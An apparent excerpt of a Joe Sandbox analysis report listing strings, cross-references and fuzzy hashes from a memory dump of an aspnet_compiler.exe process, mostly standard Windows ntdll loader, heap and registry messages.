                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                                                                        • API String ID: 0-1391187441
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: $ $0
                                                                                                        • API String ID: 0-3352262554
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                        • API String ID: 0-4253913091
                                                                                                        Strings
                                                                                                        • HEAP: , xrefs: 01781596
                                                                                                        • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 01781728
                                                                                                        • HEAP[%wZ]: , xrefs: 01781712
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                        • API String ID: 0-3178619729
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: FilterFullPath$UseFilter$\??\
                                                                                                        • API String ID: 0-2779062949
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit${
                                                                                                        • API String ID: 0-373624363
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: %$&$@
                                                                                                        • API String ID: 0-1537733988
                                                                                                        Strings
                                                                                                        • LdrpCompleteMapModule, xrefs: 017EA590
                                                                                                        • Could not validate the crypto signature for DLL %wZ, xrefs: 017EA589
                                                                                                        • minkernel\ntdll\ldrmap.c, xrefs: 017EA59A
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                                                                        • API String ID: 0-1676968949
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
                                                                                                        • API String ID: 0-1151232445
                                                                                                        Strings
                                                                                                        • @, xrefs: 0183C1F1
                                                                                                        • PreferredUILanguages, xrefs: 0183C212
                                                                                                        • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0183C1C5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                                        • API String ID: 0-2968386058
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                                        • API String ID: 0-1373925480
                                                                                                        Strings
                                                                                                        • SXS: %s() passed the empty activation context data, xrefs: 017F29FE
                                                                                                        • RtlCreateActivationContext, xrefs: 017F29F9
                                                                                                        • Actx , xrefs: 017B33AC
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                                                                                                        • API String ID: 0-859632880
                                                                                                        Strings
                                                                                                        • GlobalFlag, xrefs: 0180B68F
                                                                                                        • @, xrefs: 0180B670
                                                                                                        • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 0180B632
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                                                                                                        • API String ID: 0-4192008846
                                                                                                        Strings
                                                                                                        • @, xrefs: 017C12A5
                                                                                                        • \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 017C127B
                                                                                                        • BuildLabEx, xrefs: 017C130F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                                        • API String ID: 0-3051831665
                                                                                                        Strings
                                                                                                        • Process initialization failed with status 0x%08lx, xrefs: 018020F3
                                                                                                        • LdrpInitializationFailure, xrefs: 018020FA
                                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 01802104
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                        • API String ID: 0-2986994758
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ___swprintf_l
                                                                                                        • String ID: #%u
                                                                                                        • API String ID: 48624451-232158463
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: @$@
                                                                                                        • API String ID: 0-149943524
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: `$`
                                                                                                        • API String ID: 0-197956300
                                                                                                        Strings
                                                                                                        • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0178063D
                                                                                                        • kLsE, xrefs: 01780540
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                        • API String ID: 0-2547482624
                                                                                                        Strings
                                                                                                        • RtlpResUltimateFallbackInfo Exit, xrefs: 0178A309
                                                                                                        • RtlpResUltimateFallbackInfo Enter, xrefs: 0178A2FB
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                        • API String ID: 0-2876891731
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
                                                                                                        • API String ID: 0-118005554
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        • String ID: .Local\$@
                                                                                                        • API String ID: 0-380025441
                                                                                                        Strings
                                                                                                        • RtlpInitializeAssemblyStorageMap, xrefs: 017F2A90
                                                                                                        • SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 017F2A95
                                                                                                        • String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
                                                                                                        • API String ID: 0-2653619699
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID: Cleanup Group$Threadpool!
                                                                                                        • API String ID: 2994545307-4008356553
                                                                                                        • String ID: PreferredUILanguages
                                                                                                        • API String ID: 0-1884656846
                                                                                                        • String ID: kLsE
                                                                                                        • API String ID: 0-3058123920
                                                                                                        • String ID: #
                                                                                                        • API String ID: 0-1885708031
                                                                                                        • String ID: Actx
                                                                                                        • API String ID: 0-89312691
                                                                                                        • Opcode ID: cf83e80c8567c06f164737c2f37b7a9e1f3bb9162e3eb77f17b94fbe06e4a990
                                                                                                        • Instruction ID: c1cf60489cb73b729ab5aa7e17ea82ef246d819572e212c5ac6449967f53749d
                                                                                                        • Opcode Fuzzy Hash: cf83e80c8567c06f164737c2f37b7a9e1f3bb9162e3eb77f17b94fbe06e4a990
                                                                                                        • Instruction Fuzzy Hash: 12B18270A0026A8BDB35CF68C880BA9F7B1EF48704F1485E9D50AE7245EB31DEC5CB20
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 12913ee360840f70190646bcfb2e84e333329f913d02953146bef186ab89552d
                                                                                                        • Instruction ID: 3951a782c6ba37349141abf79682774f73aa0bd5a372ba40102b9be73dc09d65
                                                                                                        • Opcode Fuzzy Hash: 12913ee360840f70190646bcfb2e84e333329f913d02953146bef186ab89552d
                                                                                                        • Instruction Fuzzy Hash: 11A10331E006199FEB22DB6CC84CBAEFBF4AB49714F150265EA01AB6D1DB749D40CB91
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 011d1fa4059b7a350d67c8ed3efbe284c705855e2c22ec850cbd3963fe6b2890
                                                                                                        • Instruction ID: 50e4be0772b9b5b987021b306bf0f455c6aafd99ed57fc9d4ca7359bceabc2be
                                                                                                        • Opcode Fuzzy Hash: 011d1fa4059b7a350d67c8ed3efbe284c705855e2c22ec850cbd3963fe6b2890
                                                                                                        • Instruction Fuzzy Hash: 7DA1AB74A00616DBEB25DF69C894BABF7A5FF54B18F10402DFB0597282EB34E911CB90
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: d5d9793ee8b3e4bc5cf1a0b751d85c6aeddb0955341b8cd0875fe606843fe1a0
                                                                                                        • Instruction ID: 0fdc11fb93f81a66de2d71ed1c1f7f1c1b0c46156166e04995cbecf3920a7d6d
                                                                                                        • Opcode Fuzzy Hash: d5d9793ee8b3e4bc5cf1a0b751d85c6aeddb0955341b8cd0875fe606843fe1a0
                                                                                                        • Instruction Fuzzy Hash: B9A1FE72A04602AFDB11DF28C984B5ABBE9FF48704F54092CF949DB651E330EE84CB91
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: d52ad973af6cd1681a90843ee3ccabc0110b5b231721cdf5d32915bffe2d2af8
                                                                                                        • Instruction ID: 5b5a5df2a936241fcaf99db574e7a780600baa1f537aee39bb9669159c4bece3
                                                                                                        • Opcode Fuzzy Hash: d52ad973af6cd1681a90843ee3ccabc0110b5b231721cdf5d32915bffe2d2af8
                                                                                                        • Instruction Fuzzy Hash: 76914732A00616DBEF24DB18E888BBDFBE1EF98714F2440A5EA05DB351FA34D909C751
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 2c21d983ba20e17a7b6700fdaf67f62bd12e1db8173703849031d99f7c6b5915
                                                                                                        • Instruction ID: 824de293e3279b8d3481918166104bee4ec5d64550fa4a6824a63d8f82bc5ad3
                                                                                                        • Opcode Fuzzy Hash: 2c21d983ba20e17a7b6700fdaf67f62bd12e1db8173703849031d99f7c6b5915
                                                                                                        • Instruction Fuzzy Hash: 9CB112B5A093418FD354CF28C480A5AFBF1BB88304F584A6EF99AD7352D331E946CB42
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: ef77f52e57248e0a38e2ba9aa8dce83b476d6933dc46b5c7b00025dfa0fff694
                                                                                                        • Instruction ID: 6c62033791bbaad2ecdb5e703d41a69a388dc66d2d734d69df004b4703fe4028
                                                                                                        • Opcode Fuzzy Hash: ef77f52e57248e0a38e2ba9aa8dce83b476d6933dc46b5c7b00025dfa0fff694
                                                                                                        • Instruction Fuzzy Hash: 78B14A74A80205CFDB25EF1CD4886B9FBF0BB8831CF244599DA259B296D731D942CFA0
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 14aa7f2389c0c2f4a5e39dfbb016f189343e77270b8e137ddafeb974bf5cdc5c
                                                                                                        • Instruction ID: d2ef10c622fe2b1a39e1822ff5dc8e3f9f4455433ec1a8e81c774abb4d0ddea5
                                                                                                        • Opcode Fuzzy Hash: 14aa7f2389c0c2f4a5e39dfbb016f189343e77270b8e137ddafeb974bf5cdc5c
                                                                                                        • Instruction Fuzzy Hash: 5A719FB5A0121A9BDF21CF68C481ABEBBF5EF84750F5D411AE901EB242E734DB418BD0
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 2f57846fa6853ce2eba42e0856427c3c37140fe7ac7bc1e87bfd5d4bd44f03bd
                                                                                                        • Instruction ID: 8542b77564c7ca26022f53af71af2fd3760a3ab8fc359ff17e7c6aeeca93ff75
                                                                                                        • Opcode Fuzzy Hash: 2f57846fa6853ce2eba42e0856427c3c37140fe7ac7bc1e87bfd5d4bd44f03bd
                                                                                                        • Instruction Fuzzy Hash: 95818372E001168BDF25CF9CC9887ADFBF2FB88314F194A6AD915B7344DA31A940CB91
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: a0899eb836fa0015d56f59656744e90ba74d15ed9e0d10d8d85ac270cdaef1d1
                                                                                                        • Instruction ID: 5862869123cbc542c771fe8c9db483da5ede2ffd9d25adcea1b0edc7e783970c
                                                                                                        • Opcode Fuzzy Hash: a0899eb836fa0015d56f59656744e90ba74d15ed9e0d10d8d85ac270cdaef1d1
                                                                                                        • Instruction Fuzzy Hash: 7E811B71A01609AFDB25CBA9C880BEEFBBAFF48354F14442DE655A7350DB30AD45CB60
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                                                        • Instruction ID: 9fccc8c66f3c0519b5aab3840d7dd312e0fe49e989056b588eb5cfc8335e508e
                                                                                                        • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                                                        • Instruction Fuzzy Hash: C2717C71A00619EFDB11DFA9C984BAEBBB8FF48744F104569E505E7290DB30EA45CB90
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 079d61e2bc7721abdb0714a4c4778cfdb2a441d41dd6c14830fe72fa7c8fa295
                                                                                                        • Instruction ID: 18ff6fde0dac8d234b0d6d0a8355aa71465e0754a71a761ddb049ab3999e890c
                                                                                                        • Opcode Fuzzy Hash: 079d61e2bc7721abdb0714a4c4778cfdb2a441d41dd6c14830fe72fa7c8fa295
                                                                                                        • Instruction Fuzzy Hash: C671F633140701AFE732DF18C884F56BBAAEF44724F25481CE296D72A5EBB5EA44CB50
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: b3133c3534113725db2a93ccdf26ba1b5c1e0291fea10cba132e8db76db5ee2b
                                                                                                        • Instruction ID: e86ff8849be98ec0d86a1fb99176090b5f0a0bc469c236b149e34b37ea8946cb
                                                                                                        • Opcode Fuzzy Hash: b3133c3534113725db2a93ccdf26ba1b5c1e0291fea10cba132e8db76db5ee2b
                                                                                                        • Instruction Fuzzy Hash: 55818275A00609DFCB09CF68C494AAEBBF1FF48310F158169D859EB355DB34EA41CB90
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 84d153d9a12ccd10922aa883b82e44e02995011cf38fe1309f97f873e2c6dc6d
                                                                                                        • Instruction ID: 2162b91ab873965ccf9a7cbd2b506fbf92a858fc071d303d6d136b0ab90cf701
                                                                                                        • Opcode Fuzzy Hash: 84d153d9a12ccd10922aa883b82e44e02995011cf38fe1309f97f873e2c6dc6d
                                                                                                        • Instruction Fuzzy Hash: E461917160061AAFD725DF68C884BABBBA9FF88718F004619F969C7240DF34E615CB91
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: bf1f81a6fb96e6f64936f1bbd33193df8cb2eb67fdee892cc8ee822b7c602d23
                                                                                                        • Instruction ID: 2b2569800614141e811070811117ebde659a0bf3f587bd14dfc5271c506a2c27
                                                                                                        • Opcode Fuzzy Hash: bf1f81a6fb96e6f64936f1bbd33193df8cb2eb67fdee892cc8ee822b7c602d23
                                                                                                        • Instruction Fuzzy Hash: 21610431A0474A8BE321CF68C494B6BBBE0BF9971CF18446DE995CB281DF35EA05C781
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 8e596ee73472315154694e7b81c11df206b3761ed919a628362ad09be5ef9f60
                                                                                                        • Instruction ID: 3d85c8df4976d12d58cb30636f48d70d39d55c40604156467a4b5794deaef68b
                                                                                                        • Opcode Fuzzy Hash: 8e596ee73472315154694e7b81c11df206b3761ed919a628362ad09be5ef9f60
                                                                                                        • Instruction Fuzzy Hash: 93415431640601AFDF26AF29D884B6AFBB5FF44724F11846AEA19DB295DB30DC40CB90
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 1acd2e317133e95167ae2d2adab447dc3d5f24d77266da7b16ebd02b92df2874
                                                                                                        • Instruction ID: 279c6cc206da94338bcd021e2fb9854b6df12da7ce676c8503e380de78e4aa60
                                                                                                        • Opcode Fuzzy Hash: 1acd2e317133e95167ae2d2adab447dc3d5f24d77266da7b16ebd02b92df2874
                                                                                                        • Instruction Fuzzy Hash: 5841C071244B46DFD722DF28C488BD6FBE8BF49714F00442DEA5A8B250D7B4E804CB60
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 9736ef1e2d2fe6ed3e8edd6ff05ccc53a0216fb05e956db353e68a80ecb75403
                                                                                                        • Instruction ID: d0c644198d7a65dddcd3968ed2af8dd518236f48a232f7dc89e7ba5d6b4d6e8a
                                                                                                        • Opcode Fuzzy Hash: 9736ef1e2d2fe6ed3e8edd6ff05ccc53a0216fb05e956db353e68a80ecb75403
                                                                                                        • Instruction Fuzzy Hash: F331E6316083429BEB21DA2CC804777FBD5ABC9750F89876AF585CB395D274DC41C792
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
